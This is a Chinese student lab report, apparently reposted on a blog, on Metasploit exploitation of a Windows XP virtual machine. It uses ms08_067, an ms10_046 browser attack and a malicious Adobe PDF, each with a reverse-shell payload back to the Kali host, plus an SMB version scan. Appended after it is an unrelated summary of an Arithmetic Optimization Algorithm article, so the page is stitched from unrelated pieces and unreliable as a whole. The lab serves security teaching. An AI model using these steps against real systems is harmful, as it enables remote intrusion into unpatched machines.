20154313 刘文亨 EXP5

本文介绍了使用Metasploit Framework (MSF)进行多种漏洞攻击的实验过程,包括ms08_067、ms10_046及Adobe工具按钮漏洞攻击等,并探讨了exploit、payload和encode的概念。

20154313Exp5 MSF基础应用

20154313 刘文亨

 

一、 实践内容
目录

· 主动攻击:ms08_067漏洞攻击

· 对浏览器攻击:ms10_046漏洞攻击

· Adobe的漏洞攻击:adobe_toolbutton

· 辅助模块的应用:smb_version

实验环境配置

· 攻击机:Kali

· 靶机: `windows XP SP3(English)

 

二、 基础问题

问题:如用自己的话解释什么是exploit,payload,encode

①exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit的功能就和火箭差不多。

②payload也就相当于载荷,实际上就是之前我们实验中做到的shellcode,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。

③encode也就是编码,它主要是为了避免之前的payload中出现坏字符,从而影响payload的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

 

三、实验过程
1. 主动攻击:ms08_067漏洞攻击

参考学长的报告内容,选用XP英文版虚拟机。

· 

 

· Kali上使用msfconsole指令进入msf控制台。

· 

kali主机键入search ms08_067 指令查询一下针对该漏洞可以运用的攻击模块:

 

· 

· 

键入use exploit/windows/smb/ms08_067_netapi ,使用该模块,再使用show payloads查看可以供我们使用的payload

 

· 

 

· 我们的目的是为了获取靶机的shell,因此这里我们选择通过反向连接来获取shellgeneric/shell_reverse_tcp。当payload,使用指令set payload generic/shell_reverse_tcppayload进行设置。

· 

接着使用指令show options查看我们需要设置的参数,发现需要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):

 

· 

· 

设置完相应的参数后,再次使用show options对攻击的选项进行查看:

 

· 

· 

接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用systeminfo指令查看靶机系统信息:

 

· 

2. 对浏览器攻击:ms10_046漏洞攻击

· 

基本步骤还是和上面一样,先利用search ms10_046指令查看可以运用的攻击模块:

 

· 

· 

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用该模块,再使用show payloads查看可以供我们使用的payload

 

· 

· 

然后查看需要设置的参数,SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOSTLHOST都应该填攻击机的IP地址:

· 

· 

· 

· 

设置好参数后,进行查看:

 

· 

· 

使用exploit指令执行漏洞,可以看到生成了一个url:

· 

 

· 

在靶机的IE浏览器上使用该url进行访问,在MSF终端看见漏洞执行成功:

 

 

· 

· 

3. 对Adobe的漏洞攻击:adobe_toolbutton

先使用search adobe查询和adobe漏洞有关的模块,我选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块,设置回连的payload

 

· 

查看需要设置的参数:

 

· 

· 

设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

 

 

 

· 

然后将该文件传送到靶机上,并且在攻击机上打开监听:

 

· 

· 

将靶机中的pdf文件打开,攻击机成功获取到靶机shell

 

· 

4. 辅助模块的应用:smb_version

· 使用show auxiliary查看可以运用的辅助模块。

 

· 我使用的是scanner/smb/smb_version,用来对靶机的smb版本进行扫描。

· 

设置靶机的IP地址(也可以设置要扫描的一段范围),以及扫描使用的线程:

 

· 

· 

使用exploit指令开始扫描,成功扫描到靶机的smb版本:

 

· 

5. smb(ms17-010)远程命令执行之msf

· https://www.cnblogs.com/backlion/p/6804863.html
按照这个操作可以实现。

· 

四、 实验体会

   这次实验我懂得了很多系统和软件都存在着漏洞,我们要及时为其打好补丁,小心被黑客入侵,也可以尝试寻找各种漏洞攻入。

 

转载于:https://www.cnblogs.com/liuwenheng/p/8977391.html

内容概要:本文系统介绍了算术优化算法(AOA)的基本原理、核心思想及Python实现方法,并通过图像分割的实际案例展示了其应用价值。AOA是一种基于种群的元启发式算法,其核心思想来源于四则运算,利用乘除运算进行全局勘探,加减运算进行局部开发,通过数学优化器加速函数(MOA)和数学优化概率(MOP)动态控制搜索过程,在全局探索与局部开发之间实现平衡。文章详细解析了算法的初始化、勘探与开发阶段的更新策略,并提供了完整的Python代码实现,结合Rastrigin函数进行测试验证。进一步地,以Flask框架搭建前后端分离系统,将AOA应用于图像分割任务,展示了其在实际工程中的可行性与高效性。最后,通过收敛速度、寻优精度等指标评估算法性能,并提出自适应参数调整、模型优化和并行计算等改进策略。; 适合人群:具备一定Python编程基础和优化算法基础知识的高校学生、科研人员及工程技术人员,尤其适合从事人工智能、图像处理、智能优化等领域的从业者;; 使用场景及目标:①理解元启发式算法的设计思想与实现机制;②掌握AOA在函数优化、图像分割等实际问题中的建模与求解方法;③学习如何将优化算法集成到Web系统中实现工程化应用;④为算法性能评估与改进提供实践参考; 阅读建议:建议读者结合代码逐行调试,深入理解算法流程中MOA与MOP的作用机制,尝试在不同测试函数上运行算法以观察性能差异,并可进一步扩展图像分割模块,引入更复杂的预处理或后处理技术以提升分割效果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值